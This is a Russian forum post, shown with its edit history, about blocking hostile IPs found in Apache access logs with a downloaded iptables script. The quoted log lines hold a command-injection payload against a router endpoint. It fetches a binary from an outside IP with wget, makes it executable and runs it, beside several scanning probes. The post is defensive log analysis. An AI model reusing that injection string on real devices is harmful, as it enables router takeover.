История изменений
Исправление demo13, (текущая версия) :
Может попробовать блокировать по IP злобного сервера?
Как пример… смотрим логи /var/log/apache2/access_log и видим такую картину:
195.1.144.109 - - [02/May/2024:11:41:52 +0200] «GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1» 403 975 «-» «Go-http-client/1.1»
83.97.73.245 - - [02/May/2024:13:00:13 +0200] «GET /actuator/gateway/routes HTTP/1.1» 404 985 «-» "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78
185.94.29.162 - - [06/Apr/2024:03:14:42 +0200] «POST /boaform/admin/formLogin HTTP/1.1» 404 1148 «http://87.189.84.104:80/admin/login.asp» «Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0»
выбраем по каким параметрам ( на пример - «boaform», «cgi-bin», «actuator» или по другим) блокировать IP злобного сервера! … см. /var/log/apache2/access_log
195.1.144.109, 83.97.73.245 и 185.94.29.162
скрипт берём отсюда: http://togusak.ddnss.de/web/ipblock.sh
запускаем скрипт:
server:~ # chmod +x ipblock.sh
server:~ # ipblock.sh start
смотрим:
server:~ # iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP tcp – 83.97.73.245 web.dyhap.org tcp dpt:https
DROP tcp – 83.97.73.245 web.dyhap.org tcp dpt:http
DROP tcp – hostedby.privatelayer.com web.dyhap.org tcp dpt:https
DROP tcp – hostedby.privatelayer.com web.dyhap.org tcp dpt:http
DROP tcp – sin.da.shadowforce.io web.dyhap.org tcp dpt:https
DROP tcp – sin.da.shadowforce.io web.dyhap.org tcp dpt:http
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
server:~ # ipblock.sh stop
смотрим:
server:~ # iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Исходная версия demo13, :
Может попробовать блокировать по IP злобного сервера?
Как пример… смотрим логи /var/log/apache2/access_log и видим такую картину:
195.1.144.109 - - [02/May/2024:11:41:52 +0200] «GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1» 403 975 «-» «Go-http-client/1.1»
83.97.73.245 - - [02/May/2024:13:00:13 +0200] «GET /actuator/gateway/routes HTTP/1.1» 404 985 «-» "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78
185.94.29.162 - - [06/Apr/2024:03:14:42 +0200] «POST /boaform/admin/formLogin HTTP/1.1» 404 1148 «http://87.189.84.104:80/admin/login.asp» «Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0»
выбраем по каким параметрам ( на пример - «boaform», «cgi-bin», «actuator» или по другим) блокировать IP злобного сервера! … см. /var/log/apache2/access_log
195.1.144.109, 83.97.73.245 и 185.94.29.162
скрипт берём отсюда: http://togusak.ddnss.de/web/ipblock.sh
запускаем скрипт:
server:~ # ipblock.sh start
смотрим:
server:~ # iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP tcp – 83.97.73.245 web.dyhap.org tcp dpt:https
DROP tcp – 83.97.73.245 web.dyhap.org tcp dpt:http
DROP tcp – hostedby.privatelayer.com web.dyhap.org tcp dpt:https
DROP tcp – hostedby.privatelayer.com web.dyhap.org tcp dpt:http
DROP tcp – sin.da.shadowforce.io web.dyhap.org tcp dpt:https
DROP tcp – sin.da.shadowforce.io web.dyhap.org tcp dpt:http
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
server:~ # ipblock.sh stop
смотрим:
server:~ # iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination